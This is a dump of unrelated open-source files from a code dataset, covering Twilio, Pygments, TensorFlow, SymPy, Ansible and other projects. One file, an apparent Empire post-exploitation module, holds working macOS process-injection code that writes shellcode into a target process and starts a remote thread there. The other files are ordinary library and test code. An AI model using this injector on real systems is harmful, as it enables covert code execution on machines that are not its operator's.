**kwargs)
class AvailablePhoneNumbers(ListResource):
name = "AvailablePhoneNumbers"
key = "available_phone_numbers"
instance = AvailablePhoneNumber
def __init__(self, base_uri, auth, timeout, phone_numbers):
super(AvailablePhoneNumbers, self).__init__(base_uri, auth, timeout)
self.phone_numbers = phone_numbers
def get(self, sid):
raise TwilioException("Individual AvailablePhoneNumbers have no sid")
def list(self, type="local", country="US", region=None, postal_code=None,
lata=None, rate_center=None, **kwargs):
"""
Search for phone numbers
"""
kwargs["in_region"] = kwargs.get("in_region", region)
kwargs["in_postal_code"] = kwargs.get("in_postal_code", postal_code)
kwargs["in_lata"] = kwargs.get("in_lata", lata)
kwargs["in_rate_center"] = kwargs.get("in_rate_center", rate_center)
params = transform_params(kwargs)
uri = "%s/%s/%s" % (self.uri, country, TYPES[type])
resp, page = self.request("GET", uri, params=params)
return [self.load_instance(i) for i in page[self.key]]
def load_instance(self, data):
instance = self.instance(self.phone_numbers)
instance.load(data)
instance.load_subresources()
return instance
class PhoneNumber(InstanceResource):
""" An IncomingPhoneNumber object
.. attribute:: sid
A 34 character string that uniquely identifies this resource.
.. attribute:: date_created
The date that this resource was created, given as GMT RFC 2822 format.
.. attribute:: date_updated
The date that this resource was last updated, in GMT RFC 2822 format.
.. attribute:: friendly_name
A human readable descriptive text for this resource, up to 64 characters
long. By default, the FriendlyName is a nicely formatted version of
the phone number.
.. attribute:: account_sid
The unique id of the Account responsible for this phone number.
.. attribute:: phone_number
The incoming phone number. e.g., +16175551212 (E.164 format)
.. attribute:: api_version
Calls to this phone number will start a new TwiML session with this
API version.
.. attribute:: voice_caller_id_lookup
Look up the caller's caller-ID name from the CNAM database (additional
charges apply). Either true or false.
.. attribute:: voice_url
The URL Twilio will request when this phone number receives a call.
.. attribute:: voice_method
The HTTP method Twilio will use when requesting the above Url.
Either GET or POST.
.. attribute:: voice_fallback_url
The URL that Twilio will request if an error occurs retrieving or
executing the TwiML requested by Url.
.. attribute:: voice_fallback_method
The HTTP method Twilio will use when requesting the VoiceFallbackUrl.
Either GET or POST.
.. attribute:: status_callback
The URL that Twilio will request to pass status parameters (such as
call ended) to your application.
.. attribute:: status_callback_method
The HTTP method Twilio will use to make requests to the
StatusCallback URL. Either GET or POST.
.. attribute:: sms_url
The URL Twilio will request when receiving an incoming SMS message
to this number.
.. attribute:: sms_method
The HTTP method Twilio will use when making requests to the SmsUrl.
Either GET or POST.
.. attribute:: sms_fallback_url
The URL that Twilio will request if an error occurs retrieving or
executing the TwiML from SmsUrl.
.. attribute:: sms_fallback_method
The HTTP method Twilio will use when requesting the above URL.
Either GET or POST.
.. attribute:: uri
The URI for this resource, relative to https://api.twilio.com.
.. attribute:: beta
(boolean) Phone numbers new to the Twilio platform are marked as beta.
"""
def load(self, entries):
""" Set the proper Account owner of this phone number """
        # Only rebuild the parent when entries includes an account_sid
if "account_sid" in entries:
# Parse the parent's uri to get the scheme and base
uri = re.sub(r'AC(.*)', entries["account_sid"],
self.parent.base_uri)
self.parent = PhoneNumbers(
uri,
self.parent.auth,
self.parent.timeout
)
self.base_uri = self.parent.uri
super(PhoneNumber, self).load(entries)
def transfer(self, account_sid):
"""
Transfer the phone number with sid from the current account to another
identified by account_sid
"""
a = self.parent.transfer(self.name, account_sid)
self.load(a.__dict__)
def update(self, **kwargs):
"""
Update this phone number instance.
"""
kwargs_copy = dict(kwargs)
change_dict_key(kwargs_copy, from_key="status_callback_url",
to_key="status_callback")
a = self.parent.update(self.name, **kwargs_copy)
self.load(a.__dict__)
def delete(self):
"""
Release this phone number from your account. Twilio will no longer
answer calls to this number, and you will stop being billed the monthly
phone number fees. The phone number will eventually be recycled and
potentially given to another customer, so use with care. If you make a
mistake, contact us... we may be able to give you the number back.
"""
return self.parent.delete(self.name)
class PhoneNumbers(ListResource):
name = "IncomingPhoneNumbers"
key = "incoming_phone_numbers"
instance = PhoneNumber
def __init__(self, base_uri, auth, timeout=UNSET_TIMEOUT):
super(PhoneNumbers, self).__init__(base_uri, auth, timeout)
self.available_phone_numbers = \
AvailablePhoneNumbers(base_uri, auth, timeout, self)
def delete(self, sid):
"""
Release this phone number from your account. Twilio will no longer
answer calls to this number, and you will stop being billed the
monthly phone number fees. The phone number will eventually be
recycled and potentially given to another customer, so use with care.
If you make a mistake, contact us... we may be able to give you the
number back.
"""
return self.delete_instance(sid)
def list(self, type=None, **kwargs):
"""
        :param phone_number: Show phone numbers that match this pattern.
            You can specify partial numbers and use '*' as a wildcard.
        :param friendly_name: Show phone numbers with this friendly name.
        :param type: Filter numbers by type. Available types are
            'local', 'mobile', or 'tollfree'.
"""
uri = self.uri
if type:
uri = "%s/%s" % (self.uri, TYPES[type])
params = transform_params(kwargs)
resp, page = self.request("GET", uri, params=params)
return [self.load_instance(i) for i in page[self.key]]
def purchase(self, status_callback_url=None, **kwargs):
"""
Attempt to purchase the specified number. The only required parameters
are **either** phone_number or area_code
:returns: Returns a :class:`PhoneNumber` instance on success,
:data:`False` on failure
:raises: A :exc:`TypeError` if neither phone_number or area_code
is specified.
"""
kwargs["StatusCallback"] = kwargs.get("status_callback",
status_callback_url)
if 'phone_number' not in kwargs and 'area_code' not in kwargs:
raise TypeError("phone_number or area_code is required")
number_type = kwargs.pop('type', False)
uri = self.uri
if number_type:
uri = "%s/%s" % (self.uri, TYPES[number_type])
params = transform_params(kwargs)
resp, instance = self.request('POST', uri, data=params)
return self.load_instance(instance)
def search(self, **kwargs):
"""
:param type: The type of phone number to search for.
:param str country: Only show numbers for this country (iso2)
:param str region: When searching the US, show numbers in this state
        :param str postal_code: Only show numbers in this postal code.
        :param str rate_center: US only.
        :param tuple near_lat_long: Find numbers close to this (lat, long)
            pair, within ``distance`` miles.
:param integer distance: Search radius for a Near- query in miles.
:param boolean beta: Whether to include numbers new to the Twilio
platform.
"""
return self.available_phone_numbers.list(**kwargs)
def transfer(self, sid, account_sid):
"""
Transfer the phone number with sid from the current account to another
identified by account_sid
"""
return self.update(sid, account_sid=account_sid)
def update(self, sid, **kwargs):
"""
Update this phone number instance
"""
kwargs_copy = dict(kwargs)
change_dict_key(kwargs_copy, from_key="status_callback_url",
to_key="status_callback")
if "application_sid" in kwargs_copy:
for sid_type in ["voice_application_sid", "sms_application_sid"]:
if sid_type not in kwargs_copy:
kwargs_copy[sid_type] = kwargs_copy["application_sid"]
del kwargs_copy["application_sid"]
return self.update_instance(sid, kwargs_copy)
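# Hedged usage sketch (not part of the original module; the account SID,
# token, URL and callback below are placeholders):
#
#     numbers = PhoneNumbers(
#         "https://api.twilio.com/2010-04-01/Accounts/ACxxx",
#         ("ACxxx", "auth_token"),
#     )
#     available = numbers.search(type="local", country="US", region="CA")
#     if available:
#         available[0].purchase(voice_url="https://example.com/voice")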
|
mit
|
deapubhi/myblog
|
node_modules/grunt-docker/node_modules/docker/node_modules/pygmentize-bundled/vendor/pygments/build-2.7/pygments/styles/default.py
|
364
|
2532
|
# -*- coding: utf-8 -*-
"""
pygments.styles.default
~~~~~~~~~~~~~~~~~~~~~~~
The default highlighting style.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Whitespace
class DefaultStyle(Style):
"""
The default style (inspired by Emacs 22).
"""
background_color = "#f8f8f8"
default_style = ""
styles = {
Whitespace: "#bbbbbb",
Comment: "italic #408080",
Comment.Preproc: "noitalic #BC7A00",
#Keyword: "bold #AA22FF",
Keyword: "bold #008000",
Keyword.Pseudo: "nobold",
Keyword.Type: "nobold #B00040",
Operator: "#666666",
Operator.Word: "bold #AA22FF",
Name.Builtin: "#008000",
Name.Function: "#0000FF",
Name.Class: "bold #0000FF",
Name.Namespace: "bold #0000FF",
Name.Exception: "bold #D2413A",
Name.Variable: "#19177C",
Name.Constant: "#880000",
Name.Label: "#A0A000",
Name.Entity: "bold #999999",
Name.Attribute: "#7D9029",
Name.Tag: "bold #008000",
Name.Decorator: "#AA22FF",
String: "#BA2121",
String.Doc: "italic",
String.Interpol: "bold #BB6688",
String.Escape: "bold #BB6622",
String.Regex: "#BB6688",
#String.Symbol: "#B8860B",
String.Symbol: "#19177C",
String.Other: "#008000",
Number: "#666666",
Generic.Heading: "bold #000080",
Generic.Subheading: "bold #800080",
Generic.Deleted: "#A00000",
Generic.Inserted: "#00A000",
Generic.Error: "#FF0000",
Generic.Emph: "italic",
Generic.Strong: "bold",
Generic.Prompt: "bold #000080",
Generic.Output: "#888",
Generic.Traceback: "#04D",
Error: "border:#FF0000"
}
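# Hedged usage sketch (not part of the original file): rendering a snippet
# with this style through the public pygments API. Guarded so importing the
# module stays side-effect free.
if __name__ == '__main__':
    from pygments import highlight
    from pygments.formatters import HtmlFormatter
    from pygments.lexers import PythonLexer

    print(highlight('x = 1', PythonLexer(), HtmlFormatter(style=DefaultStyle)))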
|
mit
|
Hackplayers/Empire-mod-Hackplayers
|
lib/modules/python/management/osx/shellcodeinject64.py
|
12
|
6833
|
from lib.common import helpers
import os
import base64
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Shellcode Inject x64',
# list of one or more authors for the module
'Author': ['@xorrior','@midnite_runr'],
# more verbose multi-line description of the module
'Description': ('Inject shellcode into a x64 bit process'),
# True if the module needs to run in the background
'Background': False,
# File extension to save the file as
'OutputExtension': None,
'NeedsAdmin' : True,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe': True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
'comment',
'https://github.com/secretsquirrel/osx_mach_stuff/blob/master/inject.c'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent': {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to run the module on',
'Required' : True,
'Value' : ''
},
'PID': {
'Description' : 'Process ID',
'Required' : True,
'Value' : ''
},
'Shellcode': {
'Description' : 'local path to bin file containing x64 shellcode',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
        # During instantiation, any settable option parameters are passed as
        # [name, value] pairs and applied to the options dictionary. This
        # mostly covers options passed on the command line.
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
processID = self.options['PID']['Value']
shellcodeBinPath = self.options['Shellcode']['Value']
if not os.path.exists(shellcodeBinPath):
print helpers.color("[!] Shellcode bin file not found.")
return ""
f = open(shellcodeBinPath, 'rb')
shellcode = base64.b64encode(f.read())
f.close()
script = """
from ctypes import *
def run():
import sys
import os
import struct
import base64
import ctypes
STACK_SIZE = 65536
VM_FLAGS_ANYWHERE = 0x0001
VM_PROT_READ = 0x01
VM_PROT_EXECUTE = 0x04
x86_THREAD_STATE64 = 4
KERN_SUCCESS = 0
remoteTask = ctypes.c_long()
remoteCode64 = ctypes.c_uint64()
remoteStack64 = ctypes.c_uint64()
remoteThread = ctypes.c_long()
cdll.LoadLibrary('/usr/lib/libc.dylib')
libc = CDLL('/usr/lib/libc.dylib')
encshellcode = "[SC]"
shellcode = base64.b64decode(encshellcode)
pid = [PID]
class remoteThreadState64(ctypes.Structure):
_fields_ = [
("__rax", ctypes.c_uint64),
("__rbx", ctypes.c_uint64),
("__rcx", ctypes.c_uint64),
("__rdx", ctypes.c_uint64),
("__rdi", ctypes.c_uint64),
("__rsi", ctypes.c_uint64),
("__rbp", ctypes.c_uint64),
("__rsp", ctypes.c_uint64),
("__r8", ctypes.c_uint64),
("__r9", ctypes.c_uint64),
("__r10", ctypes.c_uint64),
("__r11", ctypes.c_uint64),
("__r12", ctypes.c_uint64),
("__r13", ctypes.c_uint64),
("__r14", ctypes.c_uint64),
("__r15", ctypes.c_uint64),
("__rip", ctypes.c_uint64),
("__rflags", ctypes.c_uint64),
("__cs", ctypes.c_uint64),
("__fs", ctypes.c_uint64),
("__gs", ctypes.c_uint64)
]
result = libc.task_for_pid(libc.mach_task_self(), pid, ctypes.byref(remoteTask))
if (result != KERN_SUCCESS):
print "Unable to get task for pid\\n"
return ""
result = libc.mach_vm_allocate(remoteTask, ctypes.byref(remoteStack64), STACK_SIZE, VM_FLAGS_ANYWHERE)
if result != KERN_SUCCESS:
print "Unable to allocate memory for the remote stack\\n"
return ""
result = libc.mach_vm_allocate(remoteTask, ctypes.byref(remoteCode64),len(shellcode),VM_FLAGS_ANYWHERE)
if result != KERN_SUCCESS:
print "Unable to allocate memory for the remote code\\n"
return ""
longptr = ctypes.POINTER(ctypes.c_ulong)
shellcodePtr = ctypes.cast(shellcode, longptr)
result = libc.mach_vm_write(remoteTask, remoteCode64, shellcodePtr, len(shellcode))
if result != KERN_SUCCESS:
print "Unable to write process memory\\n"
return ""
result = libc.vm_protect(remoteTask, remoteCode64, len(shellcode),False, (VM_PROT_READ | VM_PROT_EXECUTE))
if result != KERN_SUCCESS:
print "Unable to modify permissions for memory\\n"
return ""
emptyarray = bytearray(sys.getsizeof(remoteThreadState64))
threadstate64 = remoteThreadState64.from_buffer_copy(emptyarray)
remoteStack64 = int(remoteStack64.value)
remoteStack64 += (STACK_SIZE / 2)
remoteStack64 -= 8
remoteStack64 = ctypes.c_uint64(remoteStack64)
threadstate64.__rip = remoteCode64
threadstate64.__rsp = remoteStack64
threadstate64.__rbp = remoteStack64
x86_THREAD_STATE64_COUNT = ctypes.sizeof(threadstate64) / ctypes.sizeof(ctypes.c_int)
result = libc.thread_create_running(remoteTask,x86_THREAD_STATE64, ctypes.byref(threadstate64), x86_THREAD_STATE64_COUNT, ctypes.byref(remoteThread))
if (result != KERN_SUCCESS):
print "Unable to execute remote thread in process"
return ""
print "Injected shellcode into process successfully!"
run()
"""
script = script.replace('[SC]', shellcode)
script = script.replace('[PID]', processID)
return script
|
bsd-3-clause
|
sdpp/python-keystoneclient
|
keystoneclient/auth/identity/access.py
|
6
|
1916
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystoneclient.auth.identity import base
from keystoneclient import utils
class AccessInfoPlugin(base.BaseIdentityPlugin):
"""A plugin that turns an existing AccessInfo object into a usable plugin.
There are cases where reuse of an auth_ref or AccessInfo object is
warranted such as from a cache, from auth_token middleware, or another
source.
Turn the existing access info object into an identity plugin. This plugin
cannot be refreshed as the AccessInfo object does not contain any
authorizing information.
:param auth_ref: the existing AccessInfo object.
:type auth_ref: keystoneclient.access.AccessInfo
    :param auth_url: the url this AccessInfo was retrieved from. Only
                     required when using AUTH_INTERFACE with get_endpoint.
                     (optional)
"""
@utils.positional()
def __init__(self, auth_ref, auth_url=None):
super(AccessInfoPlugin, self).__init__(auth_url=auth_url,
reauthenticate=False)
self.auth_ref = auth_ref
def get_auth_ref(self, session, **kwargs):
return self.auth_ref
def invalidate(self):
# NOTE(jamielennox): Don't allow the default invalidation to occur
# because on next authentication request we will only get the same
# auth_ref object again.
return False
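# Hedged usage sketch (not part of the original module): wrapping an
# AccessInfo cached elsewhere so it can be used wherever an auth plugin is
# expected; ``cached_auth_ref`` is a placeholder.
#
#     from keystoneclient import session
#
#     auth = AccessInfoPlugin(auth_ref=cached_auth_ref,
#                             auth_url='http://keystone:5000/v3')
#     sess = session.Session(auth=auth)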
|
apache-2.0
|
alfa-addon/addon
|
plugin.video.alfa/lib/requests_toolbelt/__init__.py
|
12
|
1181
|
# -*- coding: utf-8 -*-
"""
requests-toolbelt
=================
See http://toolbelt.rtfd.org/ for documentation
:copyright: (c) 2014 by Ian Cordasco and Cory Benfield
:license: Apache v2.0, see LICENSE for more details
"""
from .adapters import SSLAdapter, SourceAddressAdapter
from .auth.guess import GuessAuth
from .multipart import (
MultipartEncoder, MultipartEncoderMonitor, MultipartDecoder,
ImproperBodyPartContentException, NonMultipartContentTypeException
)
from .streaming_iterator import StreamingIterator
from .utils.user_agent import user_agent
__title__ = 'requests-toolbelt'
__authors__ = 'Ian Cordasco, Cory Benfield'
__license__ = 'Apache v2.0'
__copyright__ = 'Copyright 2014 Ian Cordasco, Cory Benfield'
__version__ = '0.9.1'
__version_info__ = tuple(int(i) for i in __version__.split('.'))
__all__ = [
'GuessAuth', 'MultipartEncoder', 'MultipartEncoderMonitor',
'MultipartDecoder', 'SSLAdapter', 'SourceAddressAdapter',
'StreamingIterator', 'user_agent', 'ImproperBodyPartContentException',
'NonMultipartContentTypeException', '__title__', '__authors__',
'__license__', '__copyright__', '__version__', '__version_info__',
]
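# Hedged usage sketch (not part of the original file): streaming a multipart
# upload with MultipartEncoder; the URL and file name are placeholders.
#
#     import requests
#
#     encoder = MultipartEncoder(fields={
#         'field': 'value',
#         'file': ('report.csv', open('report.csv', 'rb'), 'text/csv'),
#     })
#     requests.post('https://example.com/upload', data=encoder,
#                   headers={'Content-Type': encoder.content_type})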
|
gpl-3.0
|
paolodedios/tensorflow
|
tensorflow/compiler/tests/self_adjoint_eig_op_test.py
|
18
|
2194
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.self_adjoint_eig."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.tests import xla_test
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.platform import test
class SelfAdjointEigOpTest(xla_test.XLATestCase, parameterized.TestCase):
def _test(self, dtype, shape):
np.random.seed(1)
x_np = np.random.uniform(
low=-1.0, high=1.0, size=np.prod(shape)).reshape(shape).astype(dtype)
x_np = x_np + np.swapaxes(x_np, -1, -2)
n = shape[-1]
e_np, _ = np.linalg.eigh(x_np)
with self.session() as sess:
x_tf = array_ops.placeholder(dtype)
with self.test_scope():
e, v = linalg_ops.self_adjoint_eig(x_tf)
e_val, v_val = sess.run([e, v], feed_dict={x_tf: x_np})
v_diff = np.matmul(v_val, np.swapaxes(v_val, -1, -2)) - np.eye(n)
self.assertAlmostEqual(np.mean(v_diff**2), 0.0, delta=1e-6)
self.assertAlmostEqual(np.mean((e_val - e_np)**2), 0.0, delta=1e-6)
SIZES = [1, 2, 5, 10, 32]
DTYPES = [np.float32]
PARAMS = itertools.product(SIZES, DTYPES)
@parameterized.parameters(*PARAMS)
def testSelfAdjointEig(self, n, dtype):
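    # (n < 10) evaluates to 0 or 1, so the rank-2 batch shape (3, 2) is only
    # exercised for the smaller problem sizes.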
for batch_dims in [(), (3,)] + [(3, 2)] * (n < 10):
self._test(dtype, batch_dims + (n, n))
if __name__ == "__main__":
test.main()
|
apache-2.0
|
steveklabnik/servo
|
tests/wpt/web-platform-tests/mixed-content/generic/tools/generate.py
|
96
|
6567
|
#!/usr/bin/env python
import os, sys, json
from common_paths import *
import spec_validator
import argparse
def expand_pattern(expansion_pattern, test_expansion_schema):
expansion = {}
for artifact_key in expansion_pattern:
artifact_value = expansion_pattern[artifact_key]
if artifact_value == '*':
expansion[artifact_key] = test_expansion_schema[artifact_key]
elif isinstance(artifact_value, list):
expansion[artifact_key] = artifact_value
elif isinstance(artifact_value, dict):
# Flattened expansion.
expansion[artifact_key] = []
values_dict = expand_pattern(artifact_value,
test_expansion_schema[artifact_key])
for sub_key in values_dict.keys():
expansion[artifact_key] += values_dict[sub_key]
else:
expansion[artifact_key] = [artifact_value]
return expansion
def permute_expansion(expansion, artifact_order, selection=None, artifact_index=0):
    assert isinstance(artifact_order, list), "artifact_order should be a list"
    if selection is None:
        selection = {}
if artifact_index >= len(artifact_order):
yield selection
return
artifact_key = artifact_order[artifact_index]
for artifact_value in expansion[artifact_key]:
selection[artifact_key] = artifact_value
for next_selection in permute_expansion(expansion,
artifact_order,
selection,
artifact_index + 1):
yield next_selection
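# Hedged illustration (hypothetical schema, not taken from the real spec
# file): with
#   pattern = {'origin': '*', 'context_nesting': 'top'}
#   schema  = {'origin': ['same-host-https', 'cross-origin-http'],
#              'context_nesting': ['top', 'iframe']}
# expand_pattern(pattern, schema) returns
#   {'origin': ['same-host-https', 'cross-origin-http'],
#    'context_nesting': ['top']}
# and permute_expansion(expansion, ['origin', 'context_nesting']) then yields
# one selection dict per combination of the expanded values.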
def generate_selection(selection, spec, test_html_template_basename):
selection['spec_name'] = spec['name']
selection['spec_title'] = spec['title']
selection['spec_description'] = spec['description']
selection['spec_specification_url'] = spec['specification_url']
test_filename = test_file_path_pattern % selection
test_headers_filename = test_filename + ".headers"
test_directory = os.path.dirname(test_filename)
full_path = os.path.join(spec_directory, test_directory)
test_html_template = get_template(test_html_template_basename)
test_js_template = get_template("test.js.template")
disclaimer_template = get_template('disclaimer.template')
test_description_template = get_template("test_description.template")
html_template_filename = os.path.join(template_directory,
test_html_template_basename)
generated_disclaimer = disclaimer_template \
% {'generating_script_filename': os.path.relpath(__file__,
test_root_directory),
'html_template_filename': os.path.relpath(html_template_filename,
test_root_directory)}
selection['generated_disclaimer'] = generated_disclaimer.rstrip()
test_description_template = \
test_description_template.rstrip().replace("\n", "\n" + " " * 33)
selection['test_description'] = test_description_template % selection
# Adjust the template for the test invoking JS. Indent it to look nice.
    indent = "\n" + " " * 6
    test_js_template = indent + test_js_template.replace("\n", indent)
selection['test_js'] = test_js_template % selection
    # Create the directory for the test files if it does not exist yet.
    try:
        os.makedirs(full_path)
    except OSError:
        pass
# TODO(kristijanburnik): Implement the opt-in-method here.
opt_in_method = selection['opt_in_method']
selection['meta_opt_in'] = ''
if opt_in_method == 'meta-csp':
selection['meta_opt_in'] = '<meta http-equiv="Content-Security-Policy" ' + \
'content="block-all-mixed-content">'
elif opt_in_method == 'http-csp':
opt_in_headers = "Content-Security-Policy: block-all-mixed-content\n"
write_file(test_headers_filename, opt_in_headers)
elif opt_in_method == 'no-opt-in':
pass
else:
raise ValueError("Invalid opt_in_method %s" % opt_in_method)
# Write out the generated HTML file.
write_file(test_filename, test_html_template % selection)
def generate_test_source_files(spec_json, target):
test_expansion_schema = spec_json['test_expansion_schema']
specification = spec_json['specification']
spec_json_js_template = get_template('spec_json.js.template')
write_file(generated_spec_json_filename,
spec_json_js_template % {'spec_json': json.dumps(spec_json)})
# Choose a debug/release template depending on the target.
html_template = "test.%s.html.template" % target
artifact_order = test_expansion_schema.keys() + ['name']
# Create list of excluded tests.
exclusion_dict = {}
for excluded_pattern in spec_json['excluded_tests']:
excluded_expansion = \
expand_pattern(excluded_pattern,
test_expansion_schema)
for excluded_selection in permute_expansion(excluded_expansion, artifact_order):
excluded_selection_path = selection_pattern % excluded_selection
exclusion_dict[excluded_selection_path] = True
for spec in specification:
for expansion_pattern in spec['test_expansion']:
expansion = expand_pattern(expansion_pattern,
test_expansion_schema)
for selection in permute_expansion(expansion, artifact_order):
selection_path = selection_pattern % selection
if not selection_path in exclusion_dict:
generate_selection(selection,
spec,
html_template)
else:
print 'Excluding selection:', selection_path
def main(target, spec_filename):
    spec_json = load_spec_json(spec_filename)
spec_validator.assert_valid_spec_json(spec_json)
generate_test_source_files(spec_json, target)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Test suite generator utility')
    parser.add_argument('-t', '--target', type=str,
                        choices=("release", "debug"), default="release",
                        help='Sets the appropriate template for generating tests')
    parser.add_argument('-s', '--spec', type=str, default=None,
                        help='Specify a file used for describing and generating the tests')
# TODO(kristijanburnik): Add option for the spec_json file.
args = parser.parse_args()
main(args.target, args.spec)
|
mpl-2.0
|
Jorge-Rodriguez/ansible
|
lib/ansible/modules/windows/win_ping.py
|
146
|
1451
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2012, Michael DeHaan <[email protected]>, and others
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: win_ping
version_added: "1.7"
short_description: A windows version of the classic ping module
description:
- Checks management connectivity of a windows host.
- This is NOT ICMP ping; this is just a trivial test module.
- For non-Windows targets, use the M(ping) module instead.
- For Network targets, use the M(net_ping) module instead.
options:
data:
description:
- Alternate data to return instead of 'pong'.
- If this parameter is set to C(crash), the module will cause an exception.
type: str
default: pong
seealso:
- module: ping
author:
- Chris Church (@cchurch)
'''
EXAMPLES = r'''
# Test connectivity to a windows host
# ansible winserver -m win_ping
- name: Example from an Ansible Playbook
win_ping:
- name: Induce an exception to see what happens
win_ping:
data: crash
'''
RETURN = r'''
ping:
description: Value provided with the data parameter.
returned: success
type: str
sample: pong
'''
|
gpl-3.0
|
debugger22/sympy
|
sympy/physics/quantum/tests/test_operator.py
|
97
|
6870
|
from sympy import (Derivative, diff, Function, Integer, Mul, pi, sin, Symbol,
symbols)
from sympy.physics.quantum.qexpr import QExpr
from sympy.physics.quantum.dagger import Dagger
from sympy.physics.quantum.hilbert import HilbertSpace
from sympy.physics.quantum.operator import (Operator, UnitaryOperator,
HermitianOperator, OuterProduct,
DifferentialOperator,
IdentityOperator)
from sympy.physics.quantum.state import Ket, Bra, Wavefunction
from sympy.physics.quantum.qapply import qapply
from sympy.physics.quantum.represent import represent
from sympy.core.trace import Tr
from sympy.physics.quantum.spin import JzKet, JzBra
from sympy.matrices import eye
class CustomKet(Ket):
@classmethod
def default_args(self):
return ("t",)
class CustomOp(HermitianOperator):
@classmethod
def default_args(self):
return ("T",)
t_ket = CustomKet()
t_op = CustomOp()
def test_operator():
A = Operator('A')
B = Operator('B')
C = Operator('C')
assert isinstance(A, Operator)
assert isinstance(A, QExpr)
assert A.label == (Symbol('A'),)
assert A.is_commutative is False
assert A.hilbert_space == HilbertSpace()
assert A*B != B*A
assert (A*(B + C)).expand() == A*B + A*C
assert ((A + B)**2).expand() == A**2 + A*B + B*A + B**2
assert t_op.label[0] == Symbol(t_op.default_args()[0])
assert Operator() == Operator("O")
assert A*IdentityOperator() == A
def test_operator_inv():
A = Operator('A')
assert A*A.inv() == 1
assert A.inv()*A == 1
def test_hermitian():
H = HermitianOperator('H')
assert isinstance(H, HermitianOperator)
assert isinstance(H, Operator)
assert Dagger(H) == H
assert H.inv() != H
assert H.is_commutative is False
assert Dagger(H).is_commutative is False
def test_unitary():
U = UnitaryOperator('U')
assert isinstance(U, UnitaryOperator)
assert isinstance(U, Operator)
assert U.inv() == Dagger(U)
assert U*Dagger(U) == 1
assert Dagger(U)*U == 1
assert U.is_commutative is False
assert Dagger(U).is_commutative is False
def test_identity():
I = IdentityOperator()
O = Operator('O')
x = Symbol("x")
assert isinstance(I, IdentityOperator)
assert isinstance(I, Operator)
assert I * O == O
assert O * I == O
assert isinstance(I * I, IdentityOperator)
assert isinstance(3 * I, Mul)
assert isinstance(I * x, Mul)
assert I.inv() == I
assert Dagger(I) == I
assert qapply(I * O) == O
assert qapply(O * I) == O
for n in [2, 3, 5]:
assert represent(IdentityOperator(n)) == eye(n)
def test_outer_product():
k = Ket('k')
b = Bra('b')
op = OuterProduct(k, b)
assert isinstance(op, OuterProduct)
assert isinstance(op, Operator)
assert op.ket == k
assert op.bra == b
assert op.label == (k, b)
assert op.is_commutative is False
op = k*b
assert isinstance(op, OuterProduct)
assert isinstance(op, Operator)
assert op.ket == k
assert op.bra == b
assert op.label == (k, b)
assert op.is_commutative is False
op = 2*k*b
assert op == Mul(Integer(2), k, b)
op = 2*(k*b)
assert op == Mul(Integer(2), OuterProduct(k, b))
assert Dagger(k*b) == OuterProduct(Dagger(b), Dagger(k))
assert Dagger(k*b).is_commutative is False
#test the _eval_trace
assert Tr(OuterProduct(JzKet(1, 1), JzBra(1, 1))).doit() == 1
# test scaled kets and bras
assert OuterProduct(2 * k, b) == 2 * OuterProduct(k, b)
assert OuterProduct(k, 2 * b) == 2 * OuterProduct(k, b)
# test sums of kets and bras
k1, k2 = Ket('k1'), Ket('k2')
b1, b2 = Bra('b1'), Bra('b2')
assert (OuterProduct(k1 + k2, b1) ==
OuterProduct(k1, b1) + OuterProduct(k2, b1))
assert (OuterProduct(k1, b1 + b2) ==
OuterProduct(k1, b1) + OuterProduct(k1, b2))
assert (OuterProduct(1 * k1 + 2 * k2, 3 * b1 + 4 * b2) ==
3 * OuterProduct(k1, b1) +
4 * OuterProduct(k1, b2) +
6 * OuterProduct(k2, b1) +
8 * OuterProduct(k2, b2))
def test_operator_dagger():
A = Operator('A')
B = Operator('B')
assert Dagger(A*B) == Dagger(B)*Dagger(A)
assert Dagger(A + B) == Dagger(A) + Dagger(B)
assert Dagger(A**2) == Dagger(A)**2
def test_differential_operator():
x = Symbol('x')
f = Function('f')
d = DifferentialOperator(Derivative(f(x), x), f(x))
g = Wavefunction(x**2, x)
assert qapply(d*g) == Wavefunction(2*x, x)
assert d.expr == Derivative(f(x), x)
assert d.function == f(x)
assert d.variables == (x,)
assert diff(d, x) == DifferentialOperator(Derivative(f(x), x, 2), f(x))
